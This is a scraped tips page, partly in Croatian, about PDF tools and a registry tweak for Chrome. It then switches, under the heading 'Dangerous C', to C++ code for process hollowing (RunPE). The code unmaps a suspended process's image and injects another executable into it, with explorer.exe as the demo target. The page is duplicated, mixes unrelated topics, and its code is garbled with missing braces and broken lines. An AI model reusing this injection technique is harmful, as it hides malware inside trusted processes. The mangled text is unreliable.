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MERGE Multiple PDF's - Spajanje nekoliko PDF-ova i ostali PDF alati:
Virtual PDF Printer driver for old Windows 7, 8 and 8.1
Windows 10 have built-in Microsoft virtual PDF printer driver.
More Tips & Tricks:
In Notepad++ or PSPad create this tekst file:
Windows Registry Editor Version 5.00
@="\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" -- \"%1\""
Run this file with windows administrator rights.
//Dangerous C
//-------- C
//---------- C Process hollowing runpe technik
void RunPe( wstring const& target, wstring const& source )
Pe src_pe( source ); // Parse source PE structure
if ( src_pe.isvalid )
Process::CreationResults res = Process::CreateWithFlags( target, L"", CREATE_SUSPENDED, false, false ); // Start a suspended instance of target
if ( res.success )
PCONTEXT CTX = PCONTEXT( VirtualAlloc( NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE ) ); // Allocate space for context
CTX->ContextFlags = CONTEXT_FULL;
if ( GetThreadContext( res.hThread, LPCONTEXT( CTX ) ) ) // Read target context
DWORD dwImageBase;
ReadProcessMemory( res.hProcess, LPCVOID( CTX->Ebx + 8 ), LPVOID( &dwImageBase ), 4, NULL ); // Get base address of target
typedef LONG( WINAPI * NtUnmapViewOfSection )(HANDLE ProcessHandle, PVOID BaseAddress);
NtUnmapViewOfSection xNtUnmapViewOfSection;
xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
if ( 0 == xNtUnmapViewOfSection( res.hProcess, PVOID( dwImageBase ) ) ) // Unmap target code
LPVOID pImageBase = VirtualAllocEx(res.hProcess, LPVOID(dwImageBase), src_pe.NtHeadersx86.OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE); // Realloc for source code
if ( pImageBase )
Buffer src_headers( src_pe.NtHeadersx86.OptionalHeader.SizeOfHeaders ); // Read source headers
PVOID src_headers_ptr = src_pe.GetPointer( 0 );
if ( src_pe.ReadMemory( src_headers.Data(), src_headers_ptr, src_headers.Size() ) )
if ( WriteProcessMemory(res.hProcess, pImageBase, src_headers.Data(), src_headers.Size(), NULL) ) // Write source headers
bool success = true;
for (u_int i = 0; i < src_pe.sections.size(); i++) // Write all sections
// Get pointer on section and copy the content
Buffer src_section( i ).SizeOfRawData );
LPVOID src_section_ptr = src_pe.GetPointer( i ).PointerToRawData );
success &= src_pe.ReadMemory( src_section.Data(), src_section_ptr, src_section.Size() );
// Write content to target
success &= WriteProcessMemory(res.hProcess, LPVOID(DWORD(pImageBase) + i ).VirtualAddress), src_section.Data(), src_section.Size(), NULL);
if ( success )
WriteProcessMemory( res.hProcess, LPVOID( CTX->Ebx + 8 ), LPVOID( &pImageBase), sizeof(LPVOID), NULL ); // Rewrite image base
CTX->Eax = DWORD( pImageBase ) + src_pe.NtHeadersx86.OptionalHeader.AddressOfEntryPoint; // Rewrite entry point
SetThreadContext( res.hThread, LPCONTEXT( CTX ) ); // Set thread context
ResumeThread( res.hThread ); // Resume main thread
if ( res.hProcess) CloseHandle( res.hProcess );
if ( res.hThread ) CloseHandle( res.hThread );
RunPe( L"C:\\windows\\explorer.exe", L"C:\\windows\\system32\\calc.exe" );
MERGE Multiple PDF's - Spajanje nekoliko PDF-ova i ostali PDF alati:
Virtual PDF Printer driver for old Windows 7, 8 and 8.1
Windows 10 have built-in Microsoft virtual PDF printer driver.
More Tips & Tricks:
In Notepad++ or PSPad create this tekst file:
Windows Registry Editor Version 5.00
@="\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" -- \"%1\""
Run this file with windows administrator rights.
//Dangerous C
//-------- C
//---------- C Process hollowing runpe technik
void RunPe( wstring const& target, wstring const& source )
Pe src_pe( source ); // Parse source PE structure
if ( src_pe.isvalid )
Process::CreationResults res = Process::CreateWithFlags( target, L"", CREATE_SUSPENDED, false, false ); // Start a suspended instance of target
if ( res.success )
PCONTEXT CTX = PCONTEXT( VirtualAlloc( NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE ) ); // Allocate space for context
CTX->ContextFlags = CONTEXT_FULL;
if ( GetThreadContext( res.hThread, LPCONTEXT( CTX ) ) ) // Read target context
DWORD dwImageBase;
ReadProcessMemory( res.hProcess, LPCVOID( CTX->Ebx + 8 ), LPVOID( &dwImageBase ), 4, NULL ); // Get base address of target
typedef LONG( WINAPI * NtUnmapViewOfSection )(HANDLE ProcessHandle, PVOID BaseAddress);
NtUnmapViewOfSection xNtUnmapViewOfSection;
xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
if ( 0 == xNtUnmapViewOfSection( res.hProcess, PVOID( dwImageBase ) ) ) // Unmap target code
LPVOID pImageBase = VirtualAllocEx(res.hProcess, LPVOID(dwImageBase), src_pe.NtHeadersx86.OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE); // Realloc for source code
if ( pImageBase )
Buffer src_headers( src_pe.NtHeadersx86.OptionalHeader.SizeOfHeaders ); // Read source headers
PVOID src_headers_ptr = src_pe.GetPointer( 0 );
if ( src_pe.ReadMemory( src_headers.Data(), src_headers_ptr, src_headers.Size() ) )
if ( WriteProcessMemory(res.hProcess, pImageBase, src_headers.Data(), src_headers.Size(), NULL) ) // Write source headers
bool success = true;
for (u_int i = 0; i < src_pe.sections.size(); i++) // Write all sections
// Get pointer on section and copy the content
Buffer src_section( i ).SizeOfRawData );
LPVOID src_section_ptr = src_pe.GetPointer( i ).PointerToRawData );
success &= src_pe.ReadMemory( src_section.Data(), src_section_ptr, src_section.Size() );
// Write content to target
success &= WriteProcessMemory(res.hProcess, LPVOID(DWORD(pImageBase) + i ).VirtualAddress), src_section.Data(), src_section.Size(), NULL);
if ( success )
WriteProcessMemory( res.hProcess, LPVOID( CTX->Ebx + 8 ), LPVOID( &pImageBase), sizeof(LPVOID), NULL ); // Rewrite image base
CTX->Eax = DWORD( pImageBase ) + src_pe.NtHeadersx86.OptionalHeader.AddressOfEntryPoint; // Rewrite entry point
SetThreadContext( res.hThread, LPCONTEXT( CTX ) ); // Set thread context
ResumeThread( res.hThread ); // Resume main thread
if ( res.hProcess) CloseHandle( res.hProcess );
if ( res.hThread ) CloseHandle( res.hThread );
RunPe( L"C:\\windows\\explorer.exe", L"C:\\windows\\system32\\calc.exe" );
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